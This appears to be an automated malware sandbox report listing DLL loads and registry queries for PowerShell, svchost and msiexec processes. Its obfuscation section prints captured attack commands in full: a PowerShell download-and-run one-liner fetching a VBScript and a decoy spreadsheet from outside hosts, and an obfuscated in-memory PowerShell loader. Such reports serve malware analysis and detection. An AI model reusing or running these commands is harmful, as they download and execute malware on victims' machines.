                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cscapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeSection loaded: mswsock.dll
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeJump to behavior
                        Source: Binary string: stem.Core.pdb source: powershell.exe, 00000010.00000002.2717791314.0000000008840000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2704378685.0000000007961000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb0 source: powershell.exe, 00000010.00000002.2717791314.0000000008840000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: win32u.pdb source: wmpnscfg.exe

                        Data Obfuscation

                        barindex
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell").Run "powershell.exe -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx'", 0IWshShell3.Run("powershell.exe -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url", "0")
                        Source: Yara matchFile source: 00000010.00000002.2719689268.00000000096DF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.2719542932.0000000008CC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.2696790068.0000000005F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.2419519112.00000157DC9B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: 25.3.svchost.exe.20d0a6bc070.1.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 25.3.svchost.exe.20d0a6bc070.1.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Source: 25.3.svchost.exe.20d0a6bc070.0.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 25.3.svchost.exe.20d0a6bc070.0.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Irreversibly)$Global:maKSImERIngErNES = [sysTem.TEXT.enCoDInG]::asCii.GetString($coNtrARIwISe)$GLObAl:aLDrendE=$mAKSIMErIngERnes.subStrInG($alDeRsbestEmMELSErne,$yelLOwcUP)<#Uvirkeli
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Udendrsarbejdets $Osteosynovitis $Forbryderspirens), (Restaurationskkkenets @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Pseudoofficially = [AppDomain]:
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Stednavnsforskningen93)), $rgelsen).DefineDynamicModule($Fibrinolysis, $false).DefineType($fucation, $Assumes, [System.MulticastDelega
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Irreversibly)$Global:maKSImERIngErNES = [sysTem.TEXT.enCoDInG]::asCii.GetString($coNtrARIwISe)$GLObAl:aLDrendE=$mAKSIMErIngERnes.subStrInG($alDeRsbestEmMELSErne,$yelLOwcUP)<#Uvirkeli
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKl
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKl
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx'Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT 